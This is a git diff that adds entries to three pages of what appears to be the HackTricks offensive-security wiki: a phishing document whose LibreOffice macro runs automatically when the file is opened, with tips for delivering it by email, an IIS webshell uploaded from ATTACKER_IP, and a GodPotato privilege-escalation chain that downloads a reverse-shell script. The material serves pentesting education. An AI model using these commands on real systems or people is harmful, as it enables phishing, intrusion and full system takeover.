diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index 8b0fe3a3c42..3f733b1ce5b 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -83,6 +83,23 @@ Do this because you **can't save macro's inside a `.docx`** and there's a **stig - [**macphish**](https://github.com/cldrn/macphish) - [**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator) +## LibreOffice ODT auto-run macros (Basic) + +LibreOffice Writer documents can embed Basic macros and auto-execute them when the file is opened by binding the macro to the **Open Document** event (Tools → Customize → Events → Open Document → Macro…). A simple reverse shell macro looks like: + +```vb +Sub Shell + Shell("cmd /c powershell -enc BASE64_PAYLOAD"""") +End Sub +``` + +Note the doubled quotes (`""`) inside the string – LibreOffice Basic uses them to escape literal quotes, so payloads that end with `...==""")` keep both the inner command and the Shell argument balanced. + +Delivery tips: + +- Save as `.odt` and bind the macro to the document event so it fires immediately when opened. +- When emailing with `swaks`, use `--attach @resume.odt` (the `@` is required so the file bytes, not the filename string, are sent as the attachment). This is critical when abusing SMTP servers that accept arbitrary `RCPT TO` recipients without validation. + ## HTA Files An HTA is a Windows program that **combines HTML and scripting languages (such as VBScript and JScript)**. It generates the user interface and executes as a "fully trusted" application, without the constraints of a browser's security model. @@ -293,6 +310,7 @@ Check the page about **places to steal NTLM creds**: ## References +- [HTB Job – LibreOffice macro → IIS webshell → GodPotato](https://0xdf.gitlab.io/2026/01/26/htb-job.html) - [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/) - [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) - [Unit 42 – PhantomVAI Loader Delivers a Range of Infostealers](https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/) diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md index cd338fcd77f..3820f573743 100644 --- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -9,6 +9,20 @@ Test executable file extensions: - config - php +## Writable webroot → ASPX command shell + +If a low-privileged user/group has **write access to `C:\inetpub\wwwroot`**, you can drop an ASPX webshell and execute OS commands as the application pool identity (often holding **SeImpersonatePrivilege**). + +- Verify ACLs: `icacls C:\inetpub\wwwroot` or `cacls .` looking for `(F)` on your user/group. +- Upload a command webshell (e.g., fuzzdb/tennc `cmd.aspx`) using PowerShell: + +```powershell +iwr http://ATTACKER_IP/shell.aspx -OutFile C:\inetpub\wwwroot\shell.aspx +``` + +- Request `/shell.aspx` and run commands; identity typically shows `iis apppool\defaultapppool`. +- Combine with Potato-family LPE (e.g., GodPotato/SigmaPotato) when the AppPool token has SeImpersonatePrivilege to pivot to SYSTEM. + ## Internal IP Address disclosure On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address: @@ -409,6 +423,7 @@ HTTP/1.1 200 OK ## References +- [0xdf – HTB Job (IIS write → ASPX shell → GodPotato)](https://0xdf.gitlab.io/2026/01/26/htb-job.html) - [Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/) - [AMSI/ETW bypass background (HackTricks)](../../windows-hardening/av-bypass.md) diff --git a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md index b5d5208eef4..e93135cc39e 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md +++ b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md @@ -160,6 +160,16 @@ EfsPotato [pipe] Notes: - Works across Windows 8/8.1–11 and Server 2012–2022 when SeImpersonatePrivilege is present. +- Grab the binary that matches the installed runtime (e.g., `GodPotato-NET4.exe` on modern Server 2022). +- If your initial execution primitive is a webshell/UI with short timeouts, stage the payload as a script and ask GodPotato to run it instead of a long inline command. + +Quick staging pattern from a writable IIS webroot: + +```powershell +iwr http://ATTACKER_IP/GodPotato-NET4.exe -OutFile gp.exe +iwr http://ATTACKER_IP/shell.ps1 -OutFile shell.ps1 # contains your revshell +./gp.exe -cmd "powershell -ep bypass C:\inetpub\wwwroot\shell.ps1" +``` ### DCOMPotato @@ -201,6 +211,7 @@ SigmaPotato adds modern niceties like in-memory execution via .NET reflection an - [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/) - [FullPowers – Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers) - [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html) +- [HTB: Job — LibreOffice macro → IIS webshell → GodPotato to SYSTEM](https://0xdf.gitlab.io/2026/01/26/htb-job.html) - [BeichenDream/PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato) - [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)